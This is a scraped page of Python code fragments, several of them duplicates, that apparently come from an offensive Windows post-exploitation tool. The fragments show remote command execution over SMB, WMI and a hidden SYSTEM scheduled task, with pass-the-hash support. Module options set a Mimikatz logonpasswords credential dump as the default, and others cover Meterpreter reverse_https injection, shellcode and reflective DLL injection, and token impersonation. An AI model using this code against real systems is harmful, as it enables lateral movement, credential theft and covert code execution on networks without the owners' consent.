Exemple #1
0
    def __init__(self, host, protocol, username = '', password = '', domain = '', hashes = None, share = None):
        self.__host = host
        self.__username = username
        self.__password = password
        self.__serviceName = gen_random_string()
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__share = share
        self.__output = '\\Windows\\Temp\\' + gen_random_string() 
        self.__batchFile = '%TEMP%\\' + gen_random_string() + '.bat'
        self.__outputBuffer = ''
        self.__shell = '%COMSPEC% /Q /c '
        self.__retOutput = False
        self.__rpctransport = None
        self.__scmr = None
        self.__conn = None
        #self.__mode  = mode
        #self.__aesKey = aesKey
        #self.__doKerberos = doKerberos

        if hashes is not None:
        #This checks to see if we didn't provide the LM Hash
            if hashes.find(':') != -1:
                self.__lmhash, self.__nthash = hashes.split(':')
            else:
                self.__nthash = hashes

        if self.__password is None:
            self.__password = ''

        protodef = SMBEXEC.KNOWN_PROTOCOLS['{}/SMB'.format(protocol)]
        port = protodef[1]

        stringbinding = protodef[0] % self.__host

        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
        self.__rpctransport.set_dport(port)

        if hasattr(self.__rpctransport,'preferred_dialect'):
            self.__rpctransport.preferred_dialect(SMB_DIALECT)
        if hasattr(self.__rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            self.__rpctransport.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
        #rpctransport.set_kerberos(self.__doKerberos)

        self.__scmr = self.__rpctransport.get_dce_rpc()
        try:
            self.__scmr.connect()
        except Exception as e:
            traceback.print_exc()

        s = self.__rpctransport.get_smb_connection()
        # We don't wanna deal with timeouts from now on.
        s.setTimeout(100000)

        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(self.__scmr)
        self.__scHandle = resp['lpScHandle']
        self.transferClient = self.__rpctransport.get_smb_connection()
Exemple #2
0
    def options(self, context, module_options):
        '''
            USER      Search for the specified username in available tokens (default: None)
            USERFILE  File containing usernames to search for in available tokens (defult: None)
        '''

        self.user = None
        self.userfile = None

        if 'USER' in module_options and 'USERFILE' in module_options:
            context.log.error('USER and USERFILE options are mutually exclusive!')
            sys.exit(1)

        if 'USER' in module_options:
            self.user = module_options['USER']

        elif 'USERFILE' in module_options:
            path = os.path.expanduser(module_options['USERFILE'])
            
            if not os.path.exists(path):
                context.log.error('Path to USERFILE invalid!')
                sys.exit(1) 

            self.userfile = path

        self.obfs_name = gen_random_string()
Exemple #3
0
    def options(self, context, module_options):
        '''
            CMD      Command to execute on the target system(s) (Required if CMDFILE isn't specified)
            CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
        '''

        if not 'CMD' in module_options and not 'CMDFILE' in module_options:
            context.log.error('CMD or CMDFILE options are required!')
            sys.exit(1)

        if 'CMD' in module_options and 'CMDFILE' in module_options:
            context.log.error('CMD and CMDFILE are mutually exclusive!')
            sys.exit(1)

        if 'CMD' in module_options:
            self.command = module_options['CMD']

        elif 'CMDFILE' in module_options:
            path = os.path.expanduser(module_options['CMDFILE'])

            if not os.path.exists(path):
                context.log.error('Path to CMDFILE invalid!')
                sys.exit(1)

            with open(path, 'r') as cmdfile:
                self.command = cmdfile.read().strip()

        self.sct_name = gen_random_string(5)
Exemple #4
0
    def options(self, context, module_options):
        '''
            CMD      Command to execute on the target system(s) (Required if CMDFILE isn't specified)
            CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
        '''

        if not 'CMD' in module_options and not 'CMDFILE' in module_options:
            context.log.error('CMD or CMDFILE options are required!')
            sys.exit(1)

        if 'CMD' in module_options and 'CMDFILE' in module_options:
            context.log.error('CMD and CMDFILE are mutually exclusive!')
            sys.exit(1)

        if 'CMD' in module_options:
            self.command = module_options['CMD']

        elif 'CMDFILE' in module_options:
            path = os.path.expanduser(module_options['CMDFILE'])

            if not os.path.exists(path):
                context.log.error('Path to CMDFILE invalid!')
                sys.exit(1)

            with open(path, 'r') as cmdfile:
                self.command = cmdfile.read().strip()

        self.sct_name = gen_random_string(5)
Exemple #5
0
    def options(self, context, module_options):
        '''
            PATH     Path to dll/exe to inject
            PROCID   Process ID to inject into (default: current powershell process)
            EXEARGS  Arguments to pass to the executable being reflectively loaded (default: None)
        '''

        if not 'PATH' in module_options:
            context.log.error('PATH option is required!')
            exit(1)

        self.payload_path = os.path.expanduser(module_options['PATH'])
        if not os.path.exists(self.payload_path):
            context.log.error('Invalid path to EXE/DLL!')
            exit(1)

        self.procid  = None
        self.exeargs = None

        if 'PROCID' in module_options:
            self.procid = module_options['PROCID']

        if 'EXEARGS' in module_options:
            self.exeargs = module_options['EXEARGS']

        self.obfs_name = gen_random_string()
Exemple #6
0
    def options(self, context, module_options):
        '''
            USER      Search for the specified username in available tokens (default: None)
            USERFILE  File containing usernames to search for in available tokens (defult: None)
        '''

        self.user = None
        self.userfile = None

        if 'USER' in module_options and 'USERFILE' in module_options:
            context.log.error(
                'USER and USERFILE options are mutually exclusive!')
            sys.exit(1)

        if 'USER' in module_options:
            self.user = module_options['USER']

        elif 'USERFILE' in module_options:
            path = os.path.expanduser(module_options['USERFILE'])

            if not os.path.exists(path):
                context.log.error('Path to USERFILE invalid!')
                sys.exit(1)

            self.userfile = path

        self.obfs_name = gen_random_string()
Exemple #7
0
    def options(self, context, module_options):
        '''
            LHOST    IP hosting the handler
            LPORT    Handler port
            PAYLOAD  Payload to inject: reverse_http or reverse_https (default: reverse_https)
            PROCID   Process ID to inject into (default: current powershell process)
        '''

        if not 'LHOST' in module_options or not 'LPORT' in module_options:
            context.log.error('LHOST and LPORT options are required!')
            exit(1)

        self.met_payload = 'reverse_https'
        self.lhost = None
        self.lport = None
        self.procid = None

        if 'PAYLOAD' in module_options:
            self.met_payload = module_options['PAYLOAD']

        if 'PROCID' in module_options:
            self.procid = module_options['PROCID']

        self.lhost = module_options['LHOST']
        self.lport = module_options['LPORT']
        self.obfs_name = gen_random_string()
    def options(self, context, module_options):
        '''
            LHOST    IP hosting the handler
            LPORT    Handler port
            PAYLOAD  Payload to inject: reverse_http or reverse_https (default: reverse_https)
            PROCID   Process ID to inject into (default: current powershell process)
        '''

        if not 'LHOST' in module_options or not 'LPORT' in module_options:
            context.log.error('LHOST and LPORT options are required!')
            exit(1)

        self.met_payload = 'reverse_https'
        self.lhost = None
        self.lport = None
        self.procid = None

        if 'PAYLOAD' in module_options:
            self.met_payload = module_options['PAYLOAD']

        if 'PROCID' in module_options:
            self.procid = module_options['PROCID']

        self.lhost = module_options['LHOST']
        self.lport = module_options['LPORT']
        self.obfs_name = gen_random_string()
Exemple #9
0
    def __init__(self, target, username, password, domain, smbconnection, hashes=None, share=None):
        self.__target = target
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__share = share
        self.__smbconnection = smbconnection
        self.__output = '\\' + gen_random_string(6)
        self.__outputBuffer = ''
        self.__shell = 'cmd.exe /Q /c '
        self.__pwd = 'C:\\'
        self.__aesKey = None
        self.__doKerberos = False
        self.__retOutput = True
        if hashes is not None:
            self.__lmhash, self.__nthash = hashes.split(':')

        if self.__password is None:
            self.__password = '' 

        self.__dcom = DCOMConnection(self.__target, self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, oxidResolver = True, doKerberos=self.__doKerberos)
        iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,wmi.IID_IWbemLevel1Login)
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        iWbemServices= iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL, NULL)
        iWbemLevel1Login.RemRelease()

        self.__win32Process,_ = iWbemServices.GetObject('Win32_Process')
Exemple #10
0
    def options(self, context, module_options):
        '''
           COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
        '''

        self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'

        if module_options and 'COMMAND' in module_options:
            self.mimikatz_command = module_options['COMMAND']

        #context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))

        self.obfs_name = gen_random_string()
Exemple #11
0
    def options(self, context, module_options):
        '''
           COMMAND Mimikatz command to execute
        '''

        self.mimikatz_command = 'privilege::debug sekurlsa::logonpasswords exit'

        if module_options and 'COMMAND' in module_options:
            self.mimikatz_command = module_options['COMMAND']

        #context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))

        self.obfs_name = gen_random_string()
Exemple #12
0
    def options(self, context, module_options):
        """
           COMMAND Mimikatz command to execute (default: 'sekurlsa::logonpasswords')
        """

        self.mimikatz_command = "privilege::debug sekurlsa::logonpasswords exit"

        if module_options and "COMMAND" in module_options:
            self.mimikatz_command = module_options["COMMAND"]

        # context.log.debug("Mimikatz command: '{}'".format(self.mimikatz_command))

        self.obfs_name = gen_random_string()
Exemple #13
0
    def __init__(self,
                 target,
                 username,
                 password,
                 domain,
                 smbconnection,
                 hashes=None,
                 share=None):
        self.__target = target
        self.__username = username
        self.__password = password
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__share = share
        self.__smbconnection = smbconnection
        self.__output = '\\' + gen_random_string(6)
        self.__outputBuffer = ''
        self.__shell = 'cmd.exe /Q /c '
        self.__pwd = 'C:\\'
        self.__aesKey = None
        self.__doKerberos = False
        self.__retOutput = True

        if hashes is not None:
            #This checks to see if we didn't provide the LM Hash
            if hashes.find(':') != -1:
                self.__lmhash, self.__nthash = hashes.split(':')
            else:
                self.__nthash = hashes

        if self.__password is None:
            self.__password = ''

        self.__dcom = DCOMConnection(self.__target,
                                     self.__username,
                                     self.__password,
                                     self.__domain,
                                     self.__lmhash,
                                     self.__nthash,
                                     self.__aesKey,
                                     oxidResolver=True,
                                     doKerberos=self.__doKerberos)
        iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login,
                                                    wmi.IID_IWbemLevel1Login)
        iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
        iWbemServices = iWbemLevel1Login.NTLMLogin('//./root/cimv2', NULL,
                                                   NULL)
        iWbemLevel1Login.RemRelease()

        self.__win32Process, _ = iWbemServices.GetObject('Win32_Process')
Exemple #14
0
    def options(self, context, module_options):
        '''
            TARGET   Target machine(s) to execute the command on (comma seperated)
            USER     User to impersonate
            DOMAIN   Domain of the user to impersonate
            CMD      Command to execute on the target system(s) (Required if CMDFILE isn't specified)
            CMDFILE  File contaning the command to execute on the target system(s) (Required if CMD isn't specified)
        '''

        if not 'TARGET' in module_options or not 'USER' in module_options or not 'DOMAIN' in module_options:
            context.log.error('TARGET, USER and DOMAIN options are required!')
            sys.exit(1)

        if not 'CMD' in module_options and not 'CMDFILE' in module_options:
            context.log.error('CMD or CMDFILE options are required!')
            sys.exit(1)

        if 'CMD' in module_options and 'CMDFILE' in module_options:
            context.log.error('CMD and CMDFILE are mutually exclusive!')
            sys.exit(1)

        self.target_computers = ''
        self.target_user = module_options['USER']
        self.target_domain = module_options['DOMAIN']

        if 'CMD' in module_options:
            self.command = module_options['CMD']
        elif 'CMDFILE' in module_options:
            path = os.path.expanduser(module_options['CMDFILE'])

            if not os.path.exists(path):
                context.log.error('Path to CMDFILE invalid!')
                sys.exit(1)

            with open(path, 'r') as cmdfile:
                self.command = cmdfile.read().strip() 

        targets = module_options['TARGET'].split(',')
        for target in targets:
            self.target_computers += '"{}",'.format(target)
        self.target_computers = self.target_computers[:-1]

        self.obfs_name = gen_random_string()
Exemple #15
0
    def options(self, context, module_options):
        '''
            PATH     Path to the raw shellcode to inject
            PROCID   Process ID to inject into (default: current powershell process)
        '''

        if not 'PATH' in module_options:
            context.log.error('PATH option is required!')
            exit(1)

        self.shellcode_path = os.path.expanduser(module_options['PATH'])
        if not os.path.exists(self.shellcode_path):
            context.log.error('Invalid path to shellcode!')
            exit(1)

        self.procid  = None

        if 'PROCID' in module_options.keys():
            self.procid = module_options['PROCID']

        self.obfs_name = gen_random_string()
Exemple #16
0
    def options(self, context, module_options):
        '''
        '''

        self.obfs_name = gen_random_string()
Exemple #17
0
 def __init__(self, smbconnection, logger):
     self.smbconnection = smbconnection
     self.logger = logger
     self.permissions = {}
     self.root = ntpath.normpath("\\" + gen_random_string())
Exemple #18
0
 def __init__(self, smbconnection, logger):
     self.smbconnection = smbconnection
     self.logger = logger
     self.permissions = {}
     self.root = ntpath.normpath("\\" + gen_random_string())
Exemple #19
0
    def __init__(self,
                 host,
                 protocol,
                 username='',
                 password='',
                 domain='',
                 hashes=None,
                 share=None):
        self.__host = host
        self.__username = username
        self.__password = password
        self.__serviceName = gen_random_string()
        self.__domain = domain
        self.__lmhash = ''
        self.__nthash = ''
        self.__share = share
        self.__output = '\\Windows\\Temp\\' + gen_random_string()
        self.__batchFile = '%TEMP%\\' + gen_random_string() + '.bat'
        self.__outputBuffer = ''
        self.__shell = '%COMSPEC% /Q /c '
        self.__retOutput = False
        self.__rpctransport = None
        self.__scmr = None
        self.__conn = None
        #self.__mode  = mode
        #self.__aesKey = aesKey
        #self.__doKerberos = doKerberos

        if hashes is not None:
            #This checks to see if we didn't provide the LM Hash
            if hashes.find(':') != -1:
                self.__lmhash, self.__nthash = hashes.split(':')
            else:
                self.__nthash = hashes

        if self.__password is None:
            self.__password = ''

        protodef = SMBEXEC.KNOWN_PROTOCOLS['{}/SMB'.format(protocol)]
        port = protodef[1]

        stringbinding = protodef[0] % self.__host

        self.__rpctransport = transport.DCERPCTransportFactory(stringbinding)
        self.__rpctransport.set_dport(port)

        if hasattr(self.__rpctransport, 'preferred_dialect'):
            self.__rpctransport.preferred_dialect(SMB_DIALECT)
        if hasattr(self.__rpctransport, 'set_credentials'):
            # This method exists only for selected protocol sequences.
            self.__rpctransport.set_credentials(self.__username,
                                                self.__password, self.__domain,
                                                self.__lmhash, self.__nthash)
        #rpctransport.set_kerberos(self.__doKerberos)

        self.__scmr = self.__rpctransport.get_dce_rpc()
        self.__scmr.connect()
        s = self.__rpctransport.get_smb_connection()
        # We don't wanna deal with timeouts from now on.
        s.setTimeout(100000)

        self.__scmr.bind(scmr.MSRPC_UUID_SCMR)
        resp = scmr.hROpenSCManagerW(self.__scmr)
        self.__scHandle = resp['lpScHandle']
        self.transferClient = self.__rpctransport.get_smb_connection()
Exemple #20
0
    def doStuff(self, command):
        
        def output_callback(data):
            self.__outputBuffer = data

        dce = self.__rpctransport.get_dce_rpc()

        dce.set_credentials(*self.__rpctransport.get_credentials())
        dce.connect()
        #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
        dce.bind(tsch.MSRPC_UUID_TSCHS)
        tmpName = gen_random_string(8)

        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>cmd.exe</Command>
"""
        if self.__retOutput:
            tmpFileName = tmpName + '.tmp'
            xml+= """      <Arguments>/C {} &gt; %windir%\\Temp\\{} 2&gt;&amp;1</Arguments>
    </Exec>
  </Actions>
</Task>
        """.format(command, tmpFileName)
        
        elif self.__retOutput is False:
            xml+= """      <Arguments>/C {}</Arguments>
    </Exec>
  </Actions>
</Task>
        """.format(command)

        #logging.info("Task XML: {}".format(xml))
        taskCreated = False
        try:
            #logging.info('Creating task \\%s' % tmpName)
            tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
            taskCreated = True

            #logging.info('Running task \\%s' % tmpName)
            tsch.hSchRpcRun(dce, '\\%s' % tmpName)

            done = False
            while not done:
                #logging.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
                resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName)
                if resp['pLastRuntime']['wYear'] != 0:
                    done = True
                else:
                    sleep(2)

            #logging.info('Deleting task \\%s' % tmpName)
            tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
            taskCreated = False
        except tsch.DCERPCSessionError, e:
            traceback.print_exc()
            e.get_packet().dump()
Exemple #21
0
    def doStuff(self, command):
        def output_callback(data):
            self.__outputBuffer = data

        dce = self.__rpctransport.get_dce_rpc()

        dce.set_credentials(*self.__rpctransport.get_credentials())
        dce.connect()
        #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
        dce.bind(tsch.MSRPC_UUID_TSCHS)
        tmpName = gen_random_string(8)

        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>cmd.exe</Command>
"""
        if self.__retOutput:
            tmpFileName = tmpName + '.tmp'
            xml += """      <Arguments>/C {} &gt; %windir%\\Temp\\{} 2&gt;&amp;1</Arguments>
    </Exec>
  </Actions>
</Task>
        """.format(command, tmpFileName)

        elif self.__retOutput is False:
            xml += """      <Arguments>/C {}</Arguments>
    </Exec>
  </Actions>
</Task>
        """.format(command)

        #logging.info("Task XML: {}".format(xml))
        taskCreated = False
        try:
            #logging.info('Creating task \\%s' % tmpName)
            tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml,
                                     tsch.TASK_CREATE, NULL,
                                     tsch.TASK_LOGON_NONE)
            taskCreated = True

            #logging.info('Running task \\%s' % tmpName)
            tsch.hSchRpcRun(dce, '\\%s' % tmpName)

            done = False
            while not done:
                #logging.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
                resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName)
                if resp['pLastRuntime']['wYear'] != 0:
                    done = True
                else:
                    sleep(2)

            #logging.info('Deleting task \\%s' % tmpName)
            tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
            taskCreated = False
        except tsch.DCERPCSessionError, e:
            traceback.print_exc()
            e.get_packet().dump()
Exemple #22
0
    def options(self, context, module_options):
        '''
        '''

        self.obfs_name = gen_random_string()
Exemple #23
0
    def doStuff(self, command):
        
        def output_callback(data):
            self.__outputBuffer = data

        dce = self.__rpctransport.get_dce_rpc()

        dce.set_credentials(*self.__rpctransport.get_credentials())
        dce.connect()
        #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY)
        dce.bind(tsch.MSRPC_UUID_TSCHS)
        tmpName = gen_random_string(8)

        xml = """<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary>
      <Enabled>true</Enabled>
      <ScheduleByDay>
        <DaysInterval>1</DaysInterval>
      </ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="LocalSystem">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>true</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>P3D</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="LocalSystem">
    <Exec>
      <Command>cmd.exe</Command>
"""
        if self.__retOutput:
            tmpFileName = tmpName + '.tmp'
            xml+= """      <Arguments>/C {} &gt; %windir%\\Temp\\{} 2&gt;&amp;1</Arguments>
    </Exec>
  </Actions>
</Task>
        """.format(command, tmpFileName)
        
        elif self.__retOutput is False:
            xml+= """      <Arguments>/C {}</Arguments>
    </Exec>
  </Actions>
</Task>
        """.format(command)

        #logging.info("Task XML: {}".format(xml))
        taskCreated = False
        #logging.info('Creating task \\%s' % tmpName)
        tsch.hSchRpcRegisterTask(dce, '\\%s' % tmpName, xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE)
        taskCreated = True

        #logging.info('Running task \\%s' % tmpName)
        tsch.hSchRpcRun(dce, '\\%s' % tmpName)

        done = False
        while not done:
            #logging.debug('Calling SchRpcGetLastRunInfo for \\%s' % tmpName)
            resp = tsch.hSchRpcGetLastRunInfo(dce, '\\%s' % tmpName)
            if resp['pLastRuntime']['wYear'] != 0:
                done = True
            else:
                sleep(2)

        #logging.info('Deleting task \\%s' % tmpName)
        tsch.hSchRpcDelete(dce, '\\%s' % tmpName)
        taskCreated = False

        if taskCreated is True:
            tsch.hSchRpcDelete(dce, '\\%s' % tmpName)

        peer = ':'.join(map(str, self.__rpctransport.get_socket().getpeername()))
        #self.__logger.success('Executed command via ATEXEC')

        if self.__retOutput:
            smbConnection = self.__rpctransport.get_smb_connection()
            while True:
                try:
                    #logging.info('Attempting to read ADMIN$\\Temp\\%s' % tmpFileName)
                    smbConnection.getFile('ADMIN$', 'Temp\\%s' % tmpFileName, output_callback)
                    break
                except Exception as e:
                    if str(e).find('SHARING') > 0:
                        sleep(3)
                    elif str(e).find('STATUS_OBJECT_NAME_NOT_FOUND') >= 0:
                        sleep(3)
                    else:
                        raise
            #logging.debug('Deleting file ADMIN$\\Temp\\%s' % tmpFileName)
            smbConnection.deleteFile('ADMIN$', 'Temp\\%s' % tmpFileName)
        else:
            pass
            #logging.info('Output retrieval disabled')

        dce.disconnect()